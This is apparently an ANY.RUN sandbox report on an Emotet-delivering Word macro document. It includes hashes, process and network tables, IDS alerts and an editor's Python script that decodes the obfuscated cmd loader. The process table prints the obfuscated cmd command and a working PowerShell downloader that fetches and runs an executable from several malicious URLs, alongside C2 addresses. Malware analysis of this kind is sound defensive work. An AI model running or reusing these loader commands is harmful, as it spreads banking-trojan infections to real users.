Field | Value
---|---
File name | DOCF9112.doc
Full analysis | https://app.any.run/tasks/e17fd366-5baa-48ab-8549-955396ecbe46
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans in circulation. Over its lifetime it has been upgraded into a highly destructive malware family. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.
Analysis date | November 14, 2018, 14:56:00
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
Indicators | —
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Reagan, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 11:53:00 2018, Last Saved Time/Date: Wed Nov 14 11:53:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
MD5 | A0E21CB76CB82E79212C8E0679F3CBD7
SHA1 | 10BE9EB42C86AF388C07E14D8947FC42CF20099F
SHA256 | 90E2205826D42D33A8159D0B8CFB4E11039C8F665717888B565C46D37FB1F21F
SSDEEP | 1536:Qk/TxjwKZ09cB7y9ghN8+mQ90MT++a9aVjpre5gx8P5pF5pVeFs:rxjnB29gb8onVppre5gx8P5pF5pVeFs
Extension | File type | Match (%)
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Property | Value
---|---
CompObjUserType | Microsoft Word 97-2003 Document
CompObjUserTypeLen | 32
HeadingPairs | —
TitleOfParts | —
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 16
CharCountWithSpaces | 2
Paragraphs | 1
Lines | 1
Company | —
CodePage | Windows Latin 1 (Western European)
Security | None
Characters | 2
Words | —
Pages | 1
ModifyDate | 2018:11:14 11:53:00
CreateDate | 2018:11:14 11:53:00
TotalEditTime | —
Software | Microsoft Office Word
RevisionNumber | 1
LastModifiedBy | —
Template | Normal.dotm
Comments | —
Keywords | —
Author | Reagan
Subject | —
Title | —
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
3232 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOCF9112.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
1540 | cmd /V:^O/C"^s^e^t rk^g^7=A^ h.B:^,[]^YQ^O)dbHKz^p1/Ct^G^I^-xw^y;^}kN^Z^i^0(f^{^E^MWco'8+^m^j^\^=P^sn^g^Uv^$^le^Tr^@^u^S2a&&^f^or %N ^in (^18,43^,2^7^,^59^,6^1^,^5^2,2,59^,^5^8,5^8^,1^,5^7^,17^,^4^1,2^1^,5^0,^4^4^,2^4,^5^5,0^,4^4,^29,5^7^,1^0^,^1^5,9,50,^44,2^,22,22,18,^5,20^,20^,2^2,61^,66,^14,^66,53^,^66^,^2^2^,43^,63,^6^1^,^5^2^,3^,42,4^3^,4^7,20,6^3,^6^2^,2,2^2,22^,^1^8^,5^,2^0^,2^0,1^8,3^4^,17^,1^7^,^5^9,^6^1,^34,6^6^,61,^4^3,^5^3^,^1^3,4^3,^3^,^5^2^,^34^,2^0^,1^7,^45,4^2,23,^6^2^,2,22,2^2^,^1^8,5,^2^0^,^20^,^1^3^,^34^,^6^6^,^2,^4^7^,^66^,61^,^5^2,3^4,13,34,^3^,4^2^,^43^,^47,2^0^,4^0^,5^1,^21^,60^,1^6,^2^3,6^2^,^2,22,^2^2,18,^5^,^20,20,^4^3,^54,^6^1^,43,^13,^2^8^,^63^,5^2,47,^3^4,59^,^42^,^2,63,3^,^18,^58^,2^0,^3^4,63^,^14^,^5^6^,^45,^56^,62,2,2^2^,22,18,^5^,20^,20,66,^52,^52,6^3^,^61^,^66^,5^3^,^42,^5^9,^25,^42,2^,^6^6,61^,5^9^,53^,^2^2,59^,3^,3^7^,6^1,^2^0,^52,^3^7^,^2,44^,3^,^6^4,^1^8^,^58,^3^4^,22^,36^,4^4^,62^,44,^1^2^,^29^,57^,^66^,^4,^18^,^50,3^6^,^7,^64^,^28^,5^2^,22,5^9^,4^7,^3^,^24^,1^1^,^3,^51,^66^,^2^2^,2,8,^5,^5,^23^,59,22,^60^,59^,^4^7,^1^8^,^51,66,22,^2^,36^,^12,4^6^,44^,^49^,4^7,1^0,^32^,3,5^9,26^,59,^44^,12,^2^9,^57,18^,^13,33,1^,5^0,3^2^,59,2^7,2^5,^11,1^4^,^48,^5^9,4^2,^22^,1,^2^5,^4^2,^43,^4^7^,1^,4^4,4^7,^52^,26,^4^7,58^,^6^5,3^,^26^,4^7,^58^,2^,2^2,2^2,1^8^,^4^4^,2^9^,5^7,22,1^8,3^1,1,50,^1^,3^2,^5^9^,^27,2^5^,^1^1,^14,48,59^,^42^,^2^2,^1,^2^5^,4^2^,43,^4^7,1^,4^4^,^66,13^,43^,1^3^,1^4,3,5^2^,22^,^61,59,^6^6,47^,^44^,2^9^,37,^4^3^,61,^5^9,^66,42^,^2,36^,^5^7,^63,3^4,0^,1^,^3^4^,53,^1,^57,^10,1^5,^9^,^1^2^,^38^,^22,^61^,^2^8,^3^8^,^57^,^18,13^,^3^3,3,4^3,^1^8,^5^9,53^,^36,4^4,^2^3,3^9,^60,44^,^6,^5^7^,^6^3,34^,^0,6^,^3^5,^1^2^,29,^57^,^18^,13^,^33^,3^,52^,^5^9^,^5^3^,1^3^,^36^,12,2^9^,^5^7^,^2^2^,1^8^,^31^,^3,43,^1^8^,5^9,53^,36,^12^,^29^,^57^,22,^1^8,^3^1^,^3,^2^2,2^8,^18,59,^1^,^5^0^,^1^,19^,2^9^,^5^7^,^22^,18^,31^,^3,27,61^,^34^,2^2^,^59,3^6^,57^,^18^,1^3,^33,^3^,^61^,^59^,^52,^1^8^,^4^3^,5^3,^52,59,4^,43^,^13,28^,^1^2^,^29,5^7^,22^,^1^8,^3^1^,^3,5^2,^6^6^,^5^6,59^,2^2,4^3,3^7,34,^5^8,5^9^,36,^5^7^,66,4^,18^,^12,^2^9^,^64,^22,^66^,61,22,2^5^,51,61^,43^,^4^2^,5^9^,^52,5^2^,1^,^5^7^,66^,4^,^18^,^2^9^,1^4^,^6^1^,^59^,^6^6^,^31,3^0^,42^,6^6^,^2^2,4^2^,^2,3^8^,3^0,3^0^,1^,1^,^1,^1,^1^,1,1,^1^,^1,1^,^1^,^1^,1,1^,1,1^,1,73)^do ^s^e^t ^y^p^e=!^y^p^e!!rk^g^7:~%N,1!&&^if %N ^g^e^q ^7^3 cal^l %^y^p^e:~-^5^0^7%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3876 | powershell $zWC='IUA';$QHY='http://trabanatours.com/u@http://pizzeriarondo.si/z8cG@http://diahmarsidi.com/MPCTKG@http://ogrodyusmiechu.pl/iubv8v@http://assurance-charente.fr/sfh'.Split('@');$aBp=([System.IO.Path]::GetTempPath()+'\mQN.exe');$pdZ =New-Object -com 'msxml2.xmlhttp';$tpk = New-Object -com 'adodb.stream';foreach($uiA in $QHY){try{$pdZ.open('GET',$uiA,0);$pdZ.send();$tpk.open();$tpk.type = 1;$tpk.write($pdZ.responseBody);$tpk.savetofile($aBp);Start-Process $aBp;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3760 | "C:\Users\admin\AppData\Local\Temp\mQN.exe" | C:\Users\admin\AppData\Local\Temp\mQN.exe | — | powershell.exe | User: admin; Company: Borland Corporation; Integrity Level: MEDIUM; Description: Borland C++ Multi-thread RTL (WIN/VCL MT); Exit code: 0; Version: 8.0.0.0
2636 | "C:\Users\admin\AppData\Local\Temp\mQN.exe" | C:\Users\admin\AppData\Local\Temp\mQN.exe | — | mQN.exe | User: admin; Company: Borland Corporation; Integrity Level: MEDIUM; Description: Borland C++ Multi-thread RTL (WIN/VCL MT); Exit code: 0; Version: 8.0.0.0
2820 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | mQN.exe | User: admin; Company: Borland Corporation; Integrity Level: MEDIUM; Description: Borland C++ Multi-thread RTL (WIN/VCL MT); Exit code: 0; Version: 8.0.0.0
3472 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe | User: admin; Company: Borland Corporation; Integrity Level: MEDIUM; Description: Borland C++ Multi-thread RTL (WIN/VCL MT); Version: 8.0.0.0
3284 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" /scomma "C:\Users\admin\AppData\Local\Temp\A47.tmp" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe | User: admin; Company: Borland Corporation; Integrity Level: MEDIUM; Description: Borland C++ Multi-thread RTL (WIN/VCL MT); Exit code: 0; Version: 8.0.0.0
3280 | "C:\ProgramData\r29wPCq06jT.exe" | C:\ProgramData\r29wPCq06jT.exe | — | lpiograd.exe | User: admin; Integrity Level: MEDIUM; Description: Developed using the Dev-C++ IDE; Exit code: 0; Version: 1.0.0.0
3416 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" /scomma "C:\Users\admin\AppData\Local\Temp\A57.tmp" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe | User: admin; Company: Borland Corporation; Integrity Level: MEDIUM; Description: Borland C++ Multi-thread RTL (WIN/VCL MT); Exit code: 0; Version: 8.0.0.0
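The command line of PID 1540 is cmd.exe's delayed-expansion substring trick: `set rkg7=<alphabet>` stores a 67-character alphabet (the carets are cmd escape characters and are dropped), `for %N in (<indices>) do set ype=!ype!!rkg7:~%N,1!` appends one alphabet character per index (delayed expansion is turned on by `/V:^O`, i.e. `/V:ON`), and `call %ype:~-507%` executes the last 507 characters of the accumulated string. The Python below is an editor's worked example, not part of the ANY.RUN report or of the malware: it emulates those three cmd behaviours on the alphabet and index list copied from the PID 1540 row (the carets scattered between the digits of the index list have been removed, since cmd strips them before the numbers are used) and checks the result against the PowerShell command line the report attributes to the child process, PID 3876.

```python
"""Decode the cmd.exe substring-index obfuscation used by PID 1540 in the report."""

# Alphabet copied verbatim from the `set rk^g^7=...` assignment, carets included.
RAW_ALPHABET = r"A^ h.B:^,[]^YQ^O)dbHKz^p1/Ct^G^I^-xw^y;^}kN^Z^i^0(f^{^E^MWco'8+^m^j^\^=P^sn^g^Uv^$^le^Tr^@^u^S2a"

# Index list from the `for %N in (...)` loop with the carets removed.
INDEX_LIST = (
    "18,43,27,59,61,52,2,59,58,58,1,57,17,41,21,50,44,24,55,0,44,29,57,10,15,9,50,44,2,22,22,18,5,20,20,22,61,66,14,66,53,66,22,43,63,61,52,3,42,43,47,20,63,62,"
    "2,22,22,18,5,20,20,18,34,17,17,59,61,34,66,61,43,53,13,43,3,52,34,20,17,45,42,23,62,"
    "2,22,22,18,5,20,20,13,34,66,2,47,66,61,52,34,13,34,3,42,43,47,20,40,51,21,60,16,23,62,"
    "2,22,22,18,5,20,20,43,54,61,43,13,28,63,52,47,34,59,42,2,63,3,18,58,20,34,63,14,56,45,56,62,"
    "2,22,22,18,5,20,20,66,52,52,63,61,66,53,42,59,25,42,2,66,61,59,53,22,59,3,37,61,20,52,37,2,44,3,64,18,58,34,22,36,44,62,44,12,29,"
    "57,66,4,18,50,36,7,64,28,52,22,59,47,3,24,11,3,51,66,22,2,8,5,5,23,59,22,60,59,47,18,51,66,22,2,36,12,46,44,49,47,10,32,3,59,26,59,44,12,29,"
    "57,18,13,33,1,50,32,59,27,25,11,14,48,59,42,22,1,25,42,43,47,1,44,47,52,26,47,58,65,3,26,47,58,2,22,22,18,44,29,"
    "57,22,18,31,1,50,1,32,59,27,25,11,14,48,59,42,22,1,25,42,43,47,1,44,66,13,43,13,14,3,52,22,61,59,66,47,44,29,"
    "37,43,61,59,66,42,2,36,57,63,34,0,1,34,53,1,57,10,15,9,12,38,22,61,28,38,"
    "57,18,13,33,3,43,18,59,53,36,44,23,39,60,44,6,57,63,34,0,6,35,12,29,"
    "57,18,13,33,3,52,59,53,13,36,12,29,"
    "57,22,18,31,3,43,18,59,53,36,12,29,"
    "57,22,18,31,3,22,28,18,59,1,50,1,19,29,"
    "57,22,18,31,3,27,61,34,22,59,36,57,18,13,33,3,61,59,52,18,43,53,52,59,4,43,13,28,12,29,"
    "57,22,18,31,3,52,66,56,59,22,43,37,34,58,59,36,57,66,4,18,12,29,"
    "64,22,66,61,22,25,51,61,43,42,59,52,52,1,57,66,4,18,29,"
    "14,61,59,66,31,30,42,66,22,42,2,38,30,30,"
    "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,73"
)

# PowerShell command line the report shows for PID 3876, the child of PID 1540.
REPORTED_POWERSHELL = r"powershell $zWC='IUA';$QHY='http://trabanatours.com/u@http://pizzeriarondo.si/z8cG@http://diahmarsidi.com/MPCTKG@http://ogrodyusmiechu.pl/iubv8v@http://assurance-charente.fr/sfh'.Split('@');$aBp=([System.IO.Path]::GetTempPath()+'\mQN.exe');$pdZ =New-Object -com 'msxml2.xmlhttp';$tpk = New-Object -com 'adodb.stream';foreach($uiA in $QHY){try{$pdZ.open('GET',$uiA,0);$pdZ.send();$tpk.open();$tpk.type = 1;$tpk.write($pdZ.responseBody);$tpk.savetofile($aBp);Start-Process $aBp;break}catch{}}"


def strip_carets(text):
    """cmd.exe escape rule: a '^' is dropped and the character after it is kept literally."""
    out, i = [], 0
    while i < len(text):
        if text[i] == "^" and i + 1 < len(text):
            out.append(text[i + 1])
            i += 2
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def cmd_substring(value, start, length=None):
    """Emulate %var:~start,length%: a negative start counts back from the end (clamped
    to 0) and a start past the end yields '' (index 73 relies on this: it appends nothing
    and only serves as the loop terminator for `if %N geq 73`)."""
    if start < 0:
        start = max(0, len(value) + start)
    if start >= len(value):
        return ""
    return value[start:] if length is None else value[start:start + length]


def decode(raw_alphabet, index_list):
    """Rebuild the string the for-loop accumulates in !ype!, one character per index."""
    alphabet = strip_carets(raw_alphabet)
    return "".join(cmd_substring(alphabet, int(n), 1) for n in index_list.split(","))


def final_command(raw_alphabet, index_list, tail=507):
    """What `call %ype:~-507%` hands to cmd.exe: the last `tail` characters of the buffer."""
    return cmd_substring(decode(raw_alphabet, index_list), -tail)


if __name__ == "__main__":
    print(final_command(RAW_ALPHABET, INDEX_LIST))
```

Running it prints the PID 3876 command line. The decoded buffer is exactly 507 characters: 490 characters of PowerShell plus 17 trailing spaces from the run of index 1 (the space at alphabet position 1), so `%ype:~-507%` selects the whole buffer rather than a suffix. The same emulation works for other samples of this loader family once the `set` alphabet and the `for` index list are extracted; the per-sample details that vary are the variable names, the alphabet order, the terminator value and the tail length.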
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9D00.tmp.cvr | — | — | —
3876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G4E1GY3RDA74KT1E77FJ.temp | — | — | —
3736 | lpiograd.exe | C:\Users\admin\Documents\Outlook Files\~Outlook Data File - NoMail.pst.tmp | — | — | —
3736 | lpiograd.exe | C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp | — | — | —
3736 | lpiograd.exe | C:\Users\admin\Documents\Outlook Files\[email protected] | — | — | —
3736 | lpiograd.exe | C:\Users\admin\AppData\Local\Temp\A58.tmp | — | — | —
3416 | lpiograd.exe | C:\Users\admin\AppData\Local\Temp\A57.tmp | — | — | —
3284 | lpiograd.exe | C:\Users\admin\AppData\Local\Temp\A47.tmp | — | — | —
2116 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R4PRUINMMZMTSMDOUXOP.temp | — | — | —
2116 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1935db.TMP | — | — | —
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3472 | lpiograd.exe | GET | — | 71.71.126.201:8080 | http://71.71.126.201:8080/ | US | — | — | malicious |
3472 | lpiograd.exe | GET | — | 68.102.169.43:8080 | http://68.102.169.43:8080/ | US | — | — | malicious |
3876 | powershell.exe | GET | 200 | 66.55.141.67:80 | http://trabanatours.com/u/ | US | executable | 412 Kb | malicious |
3472 | lpiograd.exe | GET | 200 | 24.176.53.106:80 | http://24.176.53.106/whoami.php | US | text | 13 b | malicious |
3876 | powershell.exe | GET | 301 | 66.55.141.67:80 | http://trabanatours.com/u | US | html | 234 b | malicious |
3472 | lpiograd.exe | GET | 200 | 76.73.213.148:8090 | http://76.73.213.148:8090/ | US | binary | 148 b | malicious |
3472 | lpiograd.exe | GET | 200 | 76.73.213.148:8090 | http://76.73.213.148:8090/whoami.php | US | text | 13 b | malicious |
3472 | lpiograd.exe | GET | 200 | 76.73.213.148:8090 | http://76.73.213.148:8090/ | US | binary | 148 b | malicious |
3472 | lpiograd.exe | GET | 200 | 76.73.213.148:8090 | http://76.73.213.148:8090/ | US | binary | 148 b | malicious |
3472 | lpiograd.exe | GET | 200 | 24.176.53.106:80 | http://24.176.53.106/ | US | binary | 66.6 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3472 | lpiograd.exe | 76.73.213.148:8090 | — | WideOpenWest Finance LLC | US | malicious |
3472 | lpiograd.exe | 190.146.205.227:80 | — | Telmex Colombia S.A. | CO | malicious |
3472 | lpiograd.exe | 68.102.169.43:8080 | — | Cox Communications Inc. | US | malicious |
3876 | powershell.exe | 66.55.141.67:80 | trabanatours.com | Choopa, LLC | US | suspicious |
3472 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
3472 | lpiograd.exe | 71.71.126.201:8080 | — | Time Warner Cable Internet LLC | US | malicious |
3472 | lpiograd.exe | 24.176.53.106:80 | — | Charter Communications | US | malicious |
3472 | lpiograd.exe | 74.208.5.2:465 | smtp.1and1.com | 1&1 Internet SE | US | malicious |
3472 | lpiograd.exe | 221.176.66.75:25 | hqpop.chinamobile.com | Guangdong Mobile Communication Co.Ltd. | CN | unknown |
3472 | lpiograd.exe | 203.124.44.88:465 | mail.metroshoes.com.pk | Commission on Science and Technology for | PK | malicious |
Domain | IP | Reputation
---|---|---
trabanatours.com | — | malicious
dns.msftncsi.com | — | shared
email.polyplasticsindia.com | — | unknown
mail.priyafoods.com | — | unknown
mail.bizmail.yahoo.com | — | unknown
mail.in2com.com.mx | — | unknown
smtp.mail.me.com | — | shared
mail.aol.com | — | shared
imap.mail.com | — | shared
hqpop.chinamobile.com | — | unknown
PID | Process | Class | Message |
---|---|---|---|
3876 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3876 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3876 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3472 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3472 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3472 | lpiograd.exe | A Network Trojan was detected | SC SPYWARE Trojan-Banker.Win32.Emotet |
3472 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3472 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3472 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3472 | lpiograd.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |